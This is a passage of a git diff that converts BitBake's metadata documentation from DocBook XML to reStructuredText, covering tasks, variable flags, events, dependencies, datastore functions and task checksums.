+
+   If you try out the previous example, you might see that the
+   ``do_printdate``
+   task is only run the first time you build the recipe with the
+   ``bitbake``
+   command. This is because BitBake considers the task "up-to-date"
+   after that initial run. If you want to force the task to always be
+   rerun for experimentation purposes, you can make BitBake always
+   consider the task "out-of-date" by using the
+   :ref:`[nostamp] <bitbake-user-manual/bitbake-user-manual-metadata:Variable Flags>`
+   variable flag, as follows: ::
+
+      do_printdate[nostamp] = "1"
+
+   You can also explicitly run the task and provide the
+   -f option as follows: ::
+
+      $ bitbake recipe -c printdate -f
+
+   When manually selecting a task to run with the bitbake ``recipe
+   -c task`` command, you can omit the "do\_" prefix as part of the task
+   name.
+
+You might wonder about the practical effects of using ``addtask``
+without specifying any dependencies as is done in the following example: ::
+
+   addtask printdate
+
+In this example, assuming dependencies have not been
+added through some other means, the only way to run the task is by
+explicitly selecting it with ``bitbake`` recipe ``-c printdate``. You
+can use the ``do_listtasks`` task to list all tasks defined in a recipe
+as shown in the following example: ::
+
+   $ bitbake recipe -c listtasks
+
+For more information on task dependencies, see the
+":ref:`bitbake-user-manual/bitbake-user-manual-execution:dependencies`" section.
+
+See the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flags`" section for information
+on variable flags you can use with tasks.
+
+Deleting a Task
+---------------
+
+As well as being able to add tasks, you can delete them. Simply use the
+``deltask`` command to delete a task. For example, to delete the example
+task used in the previous sections, you would use: ::
+
+   deltask printdate
+
+If you delete a task using the ``deltask`` command and the task has
+dependencies, the dependencies are not reconnected. For example, suppose
+you have three tasks named ``do_a``, ``do_b``, and ``do_c``.
+Furthermore, ``do_c`` is dependent on ``do_b``, which in turn is
+dependent on ``do_a``. Given this scenario, if you use ``deltask`` to
+delete ``do_b``, the implicit dependency relationship between ``do_c``
+and ``do_a`` through ``do_b`` no longer exists, and ``do_c``
+dependencies are not updated to include ``do_a``. Thus, ``do_c`` is free
+to run before ``do_a``.
+
+If you want dependencies such as these to remain intact, use the
+``[noexec]`` varflag to disable the task instead of using the
+``deltask`` command to delete it: ::
+
+   do_b[noexec] = "1"
+
+Passing Information Into the Build Task Environment
+---------------------------------------------------
+
+When running a task, BitBake tightly controls the shell execution
+environment of the build tasks to make sure unwanted contamination from
+the build machine cannot influence the build.
+
+.. note::
+
+   By default, BitBake cleans the environment to include only those
+   things exported or listed in its whitelist to ensure that the build
+   environment is reproducible and consistent. You can prevent this
+   "cleaning" by setting the :term:`BB_PRESERVE_ENV` variable.
+
+Consequently, if you do want something to get passed into the build task
+environment, you must take these two steps:
+
+#. Tell BitBake to load what you want from the environment into the
+   datastore. You can do so through the
+   :term:`BB_ENV_WHITELIST` and
+   :term:`BB_ENV_EXTRAWHITE` variables. For
+   example, assume you want to prevent the build system from accessing
+   your ``$HOME/.ccache`` directory. The following command "whitelists"
+   the environment variable ``CCACHE_DIR`` causing BitBake to allow that
+   variable into the datastore: ::
+
+      export BB_ENV_EXTRAWHITE="$BB_ENV_EXTRAWHITE CCACHE_DIR"
+
+#. Tell BitBake to export what you have loaded into the datastore to the
+   task environment of every running task. Loading something from the
+   environment into the datastore (previous step) only makes it
+   available in the datastore. To export it to the task environment of
+   every running task, use a command similar to the following in your
+   local configuration file ``local.conf`` or your distribution
+   configuration file: ::
+
+      export CCACHE_DIR
+
+   .. note::
+
+      A side effect of the previous steps is that BitBake records the
+      variable as a dependency of the build process in things like the
+      setscene checksums. If doing so results in unnecessary rebuilds of
+      tasks, you can whitelist the variable so that the setscene code
+      ignores the dependency when it creates checksums.
+
+Sometimes, it is useful to be able to obtain information from the
+original execution environment. BitBake saves a copy of the original
+environment into a special variable named :term:`BB_ORIGENV`.
+
+The ``BB_ORIGENV`` variable returns a datastore object that can be
+queried using the standard datastore operators such as
+``getVar(, False)``. The datastore object is useful, for example, to
+find the original ``DISPLAY`` variable. Here is an example: ::
+
+   origenv = d.getVar("BB_ORIGENV", False)
+   bar = origenv.getVar("BAR", False)
+
+The previous example returns ``BAR`` from the original execution
+environment.
+
+Variable Flags
+==============
+
+Variable flags (varflags) help control a task's functionality and
+dependencies. BitBake reads and writes varflags to the datastore using
+the following command forms: ::
+
+   variable = d.getVarFlags("variable")
+   self.d.setVarFlags("FOO", {"func": True})
+
+When working with varflags, the same syntax, with the exception of
+overrides, applies. In other words, you can set, append, and prepend
+varflags just like variables. See the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flag syntax`" section for details.
+
+BitBake has a defined set of varflags available for recipes and classes.
+Tasks support a number of these flags which control various
+functionality of the task:
+
+-  ``[cleandirs]``: Empty directories that should be created before
+   the task runs. Directories that already exist are removed and
+   recreated to empty them.
+
+-  ``[depends]``: Controls inter-task dependencies. See the
+   :term:`DEPENDS` variable and the
+   ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:inter-task
+   dependencies`" section for more information.
+
+-  ``[deptask]``: Controls task build-time dependencies. See the
+   :term:`DEPENDS` variable and the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:build dependencies`" section for more information.
+
+-  ``[dirs]``: Directories that should be created before the task
+   runs. Directories that already exist are left as is. The last
+   directory listed is used as the current working directory for the
+   task.
+
+-  ``[lockfiles]``: Specifies one or more lockfiles to lock while the
+   task executes. Only one task may hold a lockfile, and any task that
+   attempts to lock an already locked file will block until the lock is
+   released. You can use this variable flag to accomplish mutual
+   exclusion.
+
+-  ``[noexec]``: When set to "1", marks the task as being empty, with
+   no execution required. You can use the ``[noexec]`` flag to set up
+   tasks as dependency placeholders, or to disable tasks defined
+   elsewhere that are not needed in a particular recipe.
+
+-  ``[nostamp]``: When set to "1", tells BitBake to not generate a
+   stamp file for a task, which implies the task should always be
+   executed.
+
+   .. caution::
+
+      Any task that depends (possibly indirectly) on a ``[nostamp]`` task will
+      always be executed as well. This can cause unnecessary rebuilding if you
+      are not careful.
+
+-  ``[number_threads]``: Limits tasks to a specific number of
+   simultaneous threads during execution. This varflag is useful when
+   your build host has a large number of cores but certain tasks need to
+   be rate-limited due to various kinds of resource constraints (e.g. to
+   avoid network throttling). ``number_threads`` works similarly to the
+   :term:`BB_NUMBER_THREADS` variable but is task-specific.
+
+   Set the value globally. For example, the following makes sure the
+   ``do_fetch`` task uses no more than two simultaneous execution
+   threads: do_fetch[number_threads] = "2"
+
+   .. warning::
+
+      -  Setting the varflag in individual recipes rather than globally
+         can result in unpredictable behavior.
+
+      -  Setting the varflag to a value greater than the value used in
+         the ``BB_NUMBER_THREADS`` variable causes ``number_threads`` to
+         have no effect.
+
+-  ``[postfuncs]``: List of functions to call after the completion of
+   the task.
+
+-  ``[prefuncs]``: List of functions to call before the task executes.
+
+-  ``[rdepends]``: Controls inter-task runtime dependencies. See the
+   :term:`RDEPENDS` variable, the
+   :term:`RRECOMMENDS` variable, and the
+   ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:inter-task dependencies`" section for
+   more information.
+
+-  ``[rdeptask]``: Controls task runtime dependencies. See the
+   :term:`RDEPENDS` variable, the
+   :term:`RRECOMMENDS` variable, and the
+   ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:runtime dependencies`" section for more
+   information.
+
+-  ``[recideptask]``: When set in conjunction with ``recrdeptask``,
+   specifies a task that should be inspected for additional
+   dependencies.
+
+-  ``[recrdeptask]``: Controls task recursive runtime dependencies.
+   See the :term:`RDEPENDS` variable, the
+   :term:`RRECOMMENDS` variable, and the
+   ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:recursive dependencies`" section for
+   more information.
+
+-  ``[stamp-extra-info]``: Extra stamp information to append to the
+   task's stamp. As an example, OpenEmbedded uses this flag to allow
+   machine-specific tasks.
+
+-  ``[umask]``: The umask to run the task under.
+
+Several varflags are useful for controlling how signatures are
+calculated for variables. For more information on this process, see the
+":ref:`bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)`" section.
+
+-  ``[vardeps]``: Specifies a space-separated list of additional
+   variables to add to a variable's dependencies for the purposes of
+   calculating its signature. Adding variables to this list is useful,
+   for example, when a function refers to a variable in a manner that
+   does not allow BitBake to automatically determine that the variable
+   is referred to.
+
+-  ``[vardepsexclude]``: Specifies a space-separated list of variables
+   that should be excluded from a variable's dependencies for the
+   purposes of calculating its signature.
+
+-  ``[vardepvalue]``: If set, instructs BitBake to ignore the actual
+   value of the variable and instead use the specified value when
+   calculating the variable's signature.
+
+-  ``[vardepvalueexclude]``: Specifies a pipe-separated list of
+   strings to exclude from the variable's value when calculating the
+   variable's signature.
+
+Events
+======
+
+BitBake allows installation of event handlers within recipe and class
+files. Events are triggered at certain points during operation, such as
+the beginning of operation against a given recipe (i.e. ``*.bb``), the
+start of a given task, a task failure, a task success, and so forth. The
+intent is to make it easy to do things like email notification on build
+failures.
+
+Following is an example event handler that prints the name of the event
+and the content of the ``FILE`` variable: ::
+
+   addhandler myclass_eventhandler
+   python myclass_eventhandler() {
+       from bb.event import getName
+       print("The name of the Event is %s" % getName(e))
+       print("The file we run for is %s" % d.getVar('FILE'))
+   }
+   myclass_eventhandler[eventmask] = "bb.event.BuildStarted
+   bb.event.BuildCompleted"
+
+In the previous example, an eventmask has been
+set so that the handler only sees the "BuildStarted" and
+"BuildCompleted" events. This event handler gets called every time an
+event matching the eventmask is triggered. A global variable "e" is
+defined, which represents the current event. With the ``getName(e)``
+method, you can get the name of the triggered event. The global
+datastore is available as "d". In legacy code, you might see "e.data"
+used to get the datastore. However, realize that "e.data" is deprecated
+and you should use "d" going forward.
+
+The context of the datastore is appropriate to the event in question.
+For example, "BuildStarted" and "BuildCompleted" events run before any
+tasks are executed so would be in the global configuration datastore
+namespace. No recipe-specific metadata exists in that namespace. The
+"BuildStarted" and "BuildCompleted" events also run in the main
+cooker/server process rather than any worker context. Thus, any changes
+made to the datastore would be seen by other cooker/server events within
+the current build but not seen outside of that build or in any worker
+context. Task events run in the actual tasks in question consequently
+have recipe-specific and task-specific contents. These events run in the
+worker context and are discarded at the end of task execution.
+
+During a standard build, the following common events might occur. The
+following events are the most common kinds of events that most metadata
+might have an interest in viewing:
+
+-  ``bb.event.ConfigParsed()``: Fired when the base configuration; which
+   consists of ``bitbake.conf``, ``base.bbclass`` and any global
+   ``INHERIT`` statements; has been parsed. You can see multiple such
+   events when each of the workers parse the base configuration or if
+   the server changes configuration and reparses. Any given datastore
+   only has one such event executed against it, however. If
+   ```BB_INVALIDCONF`` <#>`__ is set in the datastore by the event
+   handler, the configuration is reparsed and a new event triggered,
+   allowing the metadata to update configuration.
+
+-  ``bb.event.HeartbeatEvent()``: Fires at regular time intervals of one
+   second. You can configure the interval time using the
+   ``BB_HEARTBEAT_EVENT`` variable. The event's "time" attribute is the
+   ``time.time()`` value when the event is triggered. This event is
+   useful for activities such as system state monitoring.
+
+-  ``bb.event.ParseStarted()``: Fired when BitBake is about to start
+   parsing recipes. This event's "total" attribute represents the number
+   of recipes BitBake plans to parse.
+
+-  ``bb.event.ParseProgress()``: Fired as parsing progresses. This
+   event's "current" attribute is the number of recipes parsed as well
+   as the "total" attribute.
+
+-  ``bb.event.ParseCompleted()``: Fired when parsing is complete. This
+   event's "cached", "parsed", "skipped", "virtuals", "masked", and
+   "errors" attributes provide statistics for the parsing results.
+
+-  ``bb.event.BuildStarted()``: Fired when a new build starts. BitBake
+   fires multiple "BuildStarted" events (one per configuration) when
+   multiple configuration (multiconfig) is enabled.
+
+-  ``bb.build.TaskStarted()``: Fired when a task starts. This event's
+   "taskfile" attribute points to the recipe from which the task
+   originates. The "taskname" attribute, which is the task's name,
+   includes the ``do_`` prefix, and the "logfile" attribute point to
+   where the task's output is stored. Finally, the "time" attribute is
+   the task's execution start time.
+
+-  ``bb.build.TaskInvalid()``: Fired if BitBake tries to execute a task
+   that does not exist.
+
+-  ``bb.build.TaskFailedSilent()``: Fired for setscene tasks that fail
+   and should not be presented to the user verbosely.
+
+-  ``bb.build.TaskFailed()``: Fired for normal tasks that fail.
+
+-  ``bb.build.TaskSucceeded()``: Fired when a task successfully
+   completes.
+
+-  ``bb.event.BuildCompleted()``: Fired when a build finishes.
+
+-  ``bb.cooker.CookerExit()``: Fired when the BitBake server/cooker
+   shuts down. This event is usually only seen by the UIs as a sign they
+   should also shutdown.
+
+This next list of example events occur based on specific requests to the
+server. These events are often used to communicate larger pieces of
+information from the BitBake server to other parts of BitBake such as
+user interfaces:
+
+-  ``bb.event.TreeDataPreparationStarted()``
+-  ``bb.event.TreeDataPreparationProgress()``
+-  ``bb.event.TreeDataPreparationCompleted()``
+-  ``bb.event.DepTreeGenerated()``
+-  ``bb.event.CoreBaseFilesFound()``
+-  ``bb.event.ConfigFilePathFound()``
+-  ``bb.event.FilesMatchingFound()``
+-  ``bb.event.ConfigFilesFound()``
+-  ``bb.event.TargetsTreeGenerated()``
+
+.. _variants-class-extension-mechanism:
+
+Variants - Class Extension Mechanism
+====================================
+
+BitBake supports two features that facilitate creating from a single
+recipe file multiple incarnations of that recipe file where all
+incarnations are buildable. These features are enabled through the
+:term:`BBCLASSEXTEND` and :term:`BBVERSIONS` variables.
+
+.. note::
+
+   The mechanism for this class extension is extremely specific to the
+   implementation. Usually, the recipe's :term:`PROVIDES` , :term:`PN` , and
+   :term:`DEPENDS` variables would need to be modified by the extension
+   class. For specific examples, see the OE-Core native , nativesdk , and
+   multilib classes.
+
+-  ``BBCLASSEXTEND``: This variable is a space separated list of
+   classes used to "extend" the recipe for each variant. Here is an
+   example that results in a second incarnation of the current recipe
+   being available. This second incarnation will have the "native" class
+   inherited. ::
+
+      BBCLASSEXTEND = "native"
+
+-  ``BBVERSIONS``: This variable allows a single recipe to build
+   multiple versions of a project from a single recipe file. You can
+   also specify conditional metadata (using the
+   :term:`OVERRIDES` mechanism) for a single
+   version, or an optionally named range of versions. Here is an
+   example: ::
+
+      BBVERSIONS = "1.0 2.0 git"
+      SRC_URI_git = "git://someurl/somepath.git"
+
+      BBVERSIONS = "1.0.[0-6]:1.0.0+ 1.0.[7-9]:1.0.7+"
+      SRC_URI_append_1.0.7+ = "file://some_patch_which_the_new_versions_need.patch;patch=1"
+
+   The name of the range defaults to the original version of the recipe. For
+   example, in OpenEmbedded, the recipe file ``foo_1.0.0+.bb`` creates a default
+   name range of ``1.0.0+``. This is useful because the range name is not only
+   placed into overrides, but it is also made available for the metadata to use
+   in the variable that defines the base recipe versions for use in ``file://``
+   search paths (:term:`FILESPATH`).
+
+Dependencies
+============
+
+To allow for efficient parallel processing, BitBake handles dependencies
+at the task level. Dependencies can exist both between tasks within a
+single recipe and between tasks in different recipes. Following are
+examples of each:
+
+-  For tasks within a single recipe, a recipe's ``do_configure`` task
+   might need to complete before its ``do_compile`` task can run.
+
+-  For tasks in different recipes, one recipe's ``do_configure`` task
+   might require another recipe's ``do_populate_sysroot`` task to finish
+   first such that the libraries and headers provided by the other
+   recipe are available.
+
+This section describes several ways to declare dependencies. Remember,
+even though dependencies are declared in different ways, they are all
+simply dependencies between tasks.
+
+.. _dependencies-internal-to-the-bb-file:
+
+Dependencies Internal to the ``.bb`` File
+-----------------------------------------
+
+BitBake uses the ``addtask`` directive to manage dependencies that are
+internal to a given recipe file. You can use the ``addtask`` directive
+to indicate when a task is dependent on other tasks or when other tasks
+depend on that recipe. Here is an example: ::
+
+   addtask printdate after do_fetch before do_build
+
+In this example, the ``do_printdate`` task
+depends on the completion of the ``do_fetch`` task, and the ``do_build``
+task depends on the completion of the ``do_printdate`` task.
+
+.. note::
+
+   For a task to run, it must be a direct or indirect dependency of some
+   other task that is scheduled to run.
+
+   For illustration, here are some examples:
+
+   -  The directive ``addtask mytask before do_configure`` causes
+      ``do_mytask`` to run before ``do_configure`` runs. Be aware that
+      ``do_mytask`` still only runs if its :ref:`input
+      checksum <bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)>` has changed since the last time it was
+      run. Changes to the input checksum of ``do_mytask`` also
+      indirectly cause ``do_configure`` to run.
+
+   -  The directive ``addtask mytask after do_configure`` by itself
+      never causes ``do_mytask`` to run. ``do_mytask`` can still be run
+      manually as follows: ::
+
+         $ bitbake recipe -c mytask
+
+      Declaring ``do_mytask`` as a dependency of some other task that is
+      scheduled to run also causes it to run. Regardless, the task runs after
+      ``do_configure``.
+
+Build Dependencies
+------------------
+
+BitBake uses the :term:`DEPENDS` variable to manage
+build time dependencies. The ``[deptask]`` varflag for tasks signifies
+the task of each item listed in ``DEPENDS`` that must complete before
+that task can be executed. Here is an example: ::
+
+   do_configure[deptask] = "do_populate_sysroot"
+
+In this example, the ``do_populate_sysroot`` task
+of each item in ``DEPENDS`` must complete before ``do_configure`` can
+execute.
+
+Runtime Dependencies
+--------------------
+
+BitBake uses the :term:`PACKAGES`, :term:`RDEPENDS`, and :term:`RRECOMMENDS`
+variables to manage runtime dependencies.
+
+The ``PACKAGES`` variable lists runtime packages. Each of those packages
+can have ``RDEPENDS`` and ``RRECOMMENDS`` runtime dependencies. The
+``[rdeptask]`` flag for tasks is used to signify the task of each item
+runtime dependency which must have completed before that task can be
+executed. ::
+
+   do_package_qa[rdeptask] = "do_packagedata"
+
+In the previous
+example, the ``do_packagedata`` task of each item in ``RDEPENDS`` must
+have completed before ``do_package_qa`` can execute.
+Although ``RDEPENDS`` contains entries from the
+runtime dependency namespace, BitBake knows how to map them back
+to the build-time dependency namespace, in which the tasks are defined.
+
+Recursive Dependencies
+----------------------
+
+BitBake uses the ``[recrdeptask]`` flag to manage recursive task
+dependencies. BitBake looks through the build-time and runtime
+dependencies of the current recipe, looks through the task's inter-task
+dependencies, and then adds dependencies for the listed task. Once
+BitBake has accomplished this, it recursively works through the
+dependencies of those tasks. Iterative passes continue until all
+dependencies are discovered and added.
+
+The ``[recrdeptask]`` flag is most commonly used in high-level recipes
+that need to wait for some task to finish "globally". For example,
+``image.bbclass`` has the following: ::
+
+   do_rootfs[recrdeptask] += "do_packagedata"
+
+This statement says that the ``do_packagedata`` task of
+the current recipe and all recipes reachable (by way of dependencies)
+from the image recipe must run before the ``do_rootfs`` task can run.
+
+BitBake allows a task to recursively depend on itself by
+referencing itself in the task list: ::
+
+   do_a[recrdeptask] = "do_a do_b"
+
+In the same way as before, this means that the ``do_a``
+and ``do_b`` tasks of the current recipe and all
+recipes reachable (by way of dependencies) from the recipe
+must run before the ``do_a`` task can run. In this
+case BitBake will ignore the current recipe's ``do_a``
+task circular dependency on itself.
+
+Inter-Task Dependencies
+-----------------------
+
+BitBake uses the ``[depends]`` flag in a more generic form to manage
+inter-task dependencies. This more generic form allows for
+inter-dependency checks for specific tasks rather than checks for the
+data in ``DEPENDS``. Here is an example: ::
+
+   do_patch[depends] = "quilt-native:do_populate_sysroot"
+
+In this example, the ``do_populate_sysroot`` task of the target ``quilt-native``
+must have completed before the ``do_patch`` task can execute.
+
+The ``[rdepends]`` flag works in a similar way but takes targets in the
+runtime namespace instead of the build-time dependency namespace.
+
+Functions You Can Call From Within Python
+=========================================
+
+BitBake provides many functions you can call from within Python
+functions. This section lists the most commonly used functions, and
+mentions where to find others.
+
+Functions for Accessing Datastore Variables
+-------------------------------------------
+
+It is often necessary to access variables in the BitBake datastore using
+Python functions. The BitBake datastore has an API that allows you this
+access. Here is a list of available operations:
+
+.. list-table::
+   :widths: auto
+   :header-rows: 1
+
+   * - *Operation*
+     - *Description*
+   * - ``d.getVar("X", expand)``
+     - Returns the value of variable "X". Using "expand=True" expands the
+       value. Returns "None" if the variable "X" does not exist.
+   * - ``d.setVar("X", "value")``
+     - Sets the variable "X" to "value"
+   * - ``d.appendVar("X", "value")``
+     - Adds "value" to the end of the variable "X". Acts like ``d.setVar("X",
+       "value")`` if the variable "X" does not exist.
+   * - ``d.prependVar("X", "value")``
+     - Adds "value" to the start of the variable "X". Acts like
+       ``d.setVar("X","value")`` if the variable "X" does not exist.
+   * - ``d.delVar("X")``
+     - Deletes the variable "X" from the datastore. Does nothing if the variable
+       "X" does not exist.
+   * - ``d.renameVar("X", "Y")``
+     - Renames the variable "X" to "Y". Does nothing if the variable "X" does
+       not exist.
+   * - ``d.getVarFlag("X", flag, expand)``
+     - Returns the value of variable "X". Using "expand=True" expands the
+       value. Returns "None" if either the variable "X" or the named flag does
+       not exist.
+   * - ``d.setVarFlag("X", flag, "value")``
+     - Sets the named flag for variable "X" to "value".
+   * - ``d.appendVarFlag("X", flag, "value")``
+     - Appends "value" to the named flag on the variable "X". Acts like
+       ``d.setVarFlag("X", flag, "value")`` if the named flag does not exist.
+   * - ``d.prependVarFlag("X", flag, "value")``
+     - Prepends "value" to the named flag on the variable "X". Acts like
+       ``d.setVarFlag("X", flag, "value")`` if the named flag does not exist.
+   * - ``d.delVarFlag("X", flag)``
+     - Deletes the named flag on the variable "X" from the datastore.
+   * - ``d.setVarFlags("X", flagsdict)``
+     - Sets the flags specified in the ``flagsdict()``
+       parameter. ``setVarFlags`` does not clear previous flags. Think of this
+       operation as ``addVarFlags``.
+   * - ``d.getVarFlags("X")``
+     - Returns a ``flagsdict`` of the flags for the variable "X". Returns "None"
+       if the variable "X" does not exist.
+   * - ``d.delVarFlags("X")``
+     - Deletes all the flags for the variable "X". Does nothing if the variable
+       "X" does not exist.
+   * - ``d.expand(expression)``
+     - Expands variable references in the specified string
+       expression. References to variables that do not exist are left as is. For
+       example, ``d.expand("foo ${X}")`` expands to the literal string "foo
+       ${X}" if the variable "X" does not exist.
+
+Other Functions
+---------------
+
+You can find many other functions that can be called from Python by
+looking at the source code of the ``bb`` module, which is in
+``bitbake/lib/bb``. For example, ``bitbake/lib/bb/utils.py`` includes
+the commonly used functions ``bb.utils.contains()`` and
+``bb.utils.mkdirhier()``, which come with docstrings.
+
+Task Checksums and Setscene
+===========================
+
+BitBake uses checksums (or signatures) along with the setscene to
+determine if a task needs to be run. This section describes the process.
+To help understand how BitBake does this, the section assumes an
+OpenEmbedded metadata-based example.
+
+These checksums are stored in :term:`STAMP`. You can
+examine the checksums using the following BitBake command: ::
+
+   $ bitbake-dumpsigs
+
+This command returns the signature data in a readable
+format that allows you to examine the inputs used when the OpenEmbedded
+build system generates signatures. For example, using
+``bitbake-dumpsigs`` allows you to examine the ``do_compile`` task's
+"sigdata" for a C application (e.g. ``bash``). Running the command also
+reveals that the "CC" variable is part of the inputs that are hashed.
+Any changes to this variable would invalidate the stamp and cause the
+``do_compile`` task to run.
+
+The following list describes related variables:
+
+-  :term:`BB_HASHCHECK_FUNCTION`:
+   Specifies the name of the function to call during the "setscene" part
+   of the task's execution in order to validate the list of task hashes.
+
+-  :term:`BB_SETSCENE_DEPVALID`:
+   Specifies a function BitBake calls that determines whether BitBake
+   requires a setscene dependency to be met.
+
+-  :term:`BB_SETSCENE_VERIFY_FUNCTION2`:
+   Specifies a function to call that verifies the list of planned task
+   execution before the main task execution happens.
+
+-  :term:`BB_STAMP_POLICY`: Defines the mode
+   for comparing timestamps of stamp files.
+
+-  :term:`BB_STAMP_WHITELIST`: Lists stamp
+   files that are looked at when the stamp policy is "whitelist".
+
+-  :term:`BB_TASKHASH`: Within an executing task,
+   this variable holds the hash of the task as returned by the currently
+   enabled signature generator.
+
+-  :term:`STAMP`: The base path to create stamp files.
+
+-  :term:`STAMPCLEAN`: Again, the base path to
+   create stamp files but can use wildcards for matching a range of
+   files for clean operations.
+
+Wildcard Support in Variables
+=============================
+
+Support for wildcard use in variables varies depending on the context in
+which it is used. For example, some variables and file names allow
+limited use of wildcards through the "``%``" and "``*``" characters.
+Other variables or names support Python's
+`glob <https://docs.python.org/3/library/glob.html>`_ syntax,
+`fnmatch <https://docs.python.org/3/library/fnmatch.html#module-fnmatch>`_
+syntax, or
+`Regular Expression (re) <https://docs.python.org/3/library/re.html>`_
+syntax.
+
+For variables that have wildcard suport, the documentation describes
+which form of wildcard, its use, and its limitations.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml
deleted file mode 100644
index 0ca5321618..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml
+++ /dev/null
@@ -1,2862 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter id="bitbake-user-manual-metadata">
-    <title>Syntax and Operators</title>
-
-    <para>
-        BitBake files have their own syntax.
-        The syntax has similarities to several
-        other languages but also has some unique features.
-        This section describes the available syntax and operators
-        as well as provides examples.
-    </para>
-
-    <section id='basic-syntax'>
-        <title>Basic Syntax</title>
-
-        <para>
-            This section provides some basic syntax examples.
-        </para>
-
-        <section id='basic-variable-setting'>
-            <title>Basic Variable Setting</title>
-
-            <para>
-                The following example sets <filename>VARIABLE</filename> to
-                "value".
-                This assignment occurs immediately as the statement is parsed.
-                It is a "hard" assignment.
-                <literallayout class='monospaced'>
-     VARIABLE = "value"
-                </literallayout>
-                As expected, if you include leading or trailing spaces as part of
-                an assignment, the spaces are retained:
-                <literallayout class='monospaced'>
-     VARIABLE = " value"
-     VARIABLE = "value "
-                </literallayout>
-                Setting <filename>VARIABLE</filename> to "" sets it to an empty string,
-                while setting the variable to " " sets it to a blank space
-                (i.e. these are not the same values).
-                <literallayout class='monospaced'>
-     VARIABLE = ""
-     VARIABLE = " "
-                </literallayout>
-            </para>
-
-            <para>
-                You can use single quotes instead of double quotes
-                when setting a variable's value.
-                Doing so allows you to use values that contain the double
-                quote character:
-                <literallayout class='monospaced'>
-     VARIABLE = 'I have a " in my value'
-                </literallayout>
-                <note>
-                    Unlike in Bourne shells, single quotes work identically
-                    to double quotes in all other ways.
-                    They do not suppress variable expansions.
-                </note>
-            </para>
-        </section>
-
-        <section id='modifying-existing-variables'>
-            <title>Modifying Existing Variables</title>
-
-            <para>
-                Sometimes you need to modify existing variables.
-                Following are some cases where you might find you want to
-                modify an existing variable:
-                <itemizedlist>
-                    <listitem><para>
-                        Customize a recipe that uses the variable.
-                        </para></listitem>
-                    <listitem><para>
-                        Change a variable's default value used in a
-                        <filename>*.bbclass</filename> file.
-                        </para></listitem>
-                    <listitem><para>
-                        Change the variable in a <filename>*.bbappend</filename>
-                        file to override the variable in the original recipe.
-                        </para></listitem>
-                    <listitem><para>
-                        Change the variable in a configuration file so that the
-                        value overrides an existing configuration.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Changing a variable value can sometimes depend on how the
-                value was originally assigned and also on the desired
-                intent of the change.
-                In particular, when you append a value to a variable that
-                has a default value, the resulting value might not be what
-                you expect.
-                In this case, the value you provide might replace the value
-                rather than append to the default value.
-            </para>
-
-            <para>
-                If after you have changed a variable's value and something
-                unexplained occurs, you can use BitBake to check the actual
-                value of the suspect variable.
-                You can make these checks for both configuration and recipe
-                level changes:
-                <itemizedlist>
-                    <listitem><para>
-                        For configuration changes, use the following:
-                        <literallayout class='monospaced'>
-     $ bitbake -e
-                        </literallayout>
-                        This command displays variable values after the
-                        configuration files (i.e. <filename>local.conf</filename>,
-                        <filename>bblayers.conf</filename>,
-                        <filename>bitbake.conf</filename> and so forth) have
-                        been parsed.
-                        <note>
-                            Variables that are exported to the environment are
-                            preceded by the string "export" in the command's
-                            output.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        For recipe changes, use the following:
-                        <literallayout class='monospaced'>
-     $ bitbake <replaceable>recipe</replaceable> -e | grep VARIABLE="
-                        </literallayout>
-                        This command checks to see if the variable actually
-                        makes it into a specific recipe.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='line-joining'>
-            <title>Line Joining</title>
-
-            <para>
-                Outside of
-                <link linkend='functions'>functions</link>, BitBake joins
-                any line ending in a backslash character ("\")
-                with the following line before parsing statements.
-                The most common use for the "\" character is to split variable
-                assignments over multiple lines, as in the following example:
-                <literallayout class='monospaced'>
-     FOO = "bar \
-            baz \
-            qaz"
-                </literallayout>
-                Both the "\" character and the newline character
-                that follow it are removed when joining lines.
-                Thus, no newline characters end up in the value of
-                <filename>FOO</filename>.
-            </para>
-
-            <para>
-                Consider this additional example where the two
-                assignments both assign "barbaz" to
-                <filename>FOO</filename>:
-                <literallayout class='monospaced'>
-     FOO = "barbaz"
-
-     FOO = "bar\
-     baz"
-                </literallayout>
-                <note>
-                    BitBake does not interpret escape sequences like
-                    "\n" in variable values.
-                    For these to have an effect, the value must be passed
-                    to some utility that interprets escape sequences,
-                    such as <filename>printf</filename> or
-                    <filename>echo -n</filename>.
-                </note>
-            </para>
-        </section>
-
-        <section id='variable-expansion'>
-            <title>Variable Expansion</title>
-
-            <para>
-                Variables can reference the contents of other variables
-                using a syntax that is similar to variable expansion in
-                Bourne shells.
-                The following assignments
-                result in A containing "aval" and B evaluating to "preavalpost".
-                <literallayout class='monospaced'>
-     A = "aval"
-     B = "pre${A}post"
-                </literallayout>
-                <note>
-                    Unlike in Bourne shells, the curly braces are mandatory:
-                    Only <filename>${FOO}</filename> and not
-                    <filename>$FOO</filename> is recognized as an expansion of
-                    <filename>FOO</filename>.
-                </note>
-                The "=" operator does not immediately expand variable
-                references in the right-hand side.
-                Instead, expansion is deferred until the variable assigned to
-                is actually used.
-                The result depends on the current values of the referenced
-                variables.
-                The following example should clarify this behavior:
-                <literallayout class='monospaced'>
-     A = "${B} baz"
-     B = "${C} bar"
-     C = "foo"
-     *At this point, ${A} equals "foo bar baz"*
-     C = "qux"
-     *At this point, ${A} equals "qux bar baz"*
-     B = "norf"
-     *At this point, ${A} equals "norf baz"*
-                </literallayout>
-                Contrast this behavior with the
-                <link linkend='immediate-variable-expansion'>immediate variable expansion</link>
-                operator (i.e. ":=").
-            </para>
-
-            <para>
-                If the variable expansion syntax is used on a variable that
-                does not exist, the string is kept as is.
-                For example, given the following assignment,
-                <filename>BAR</filename> expands to the literal string
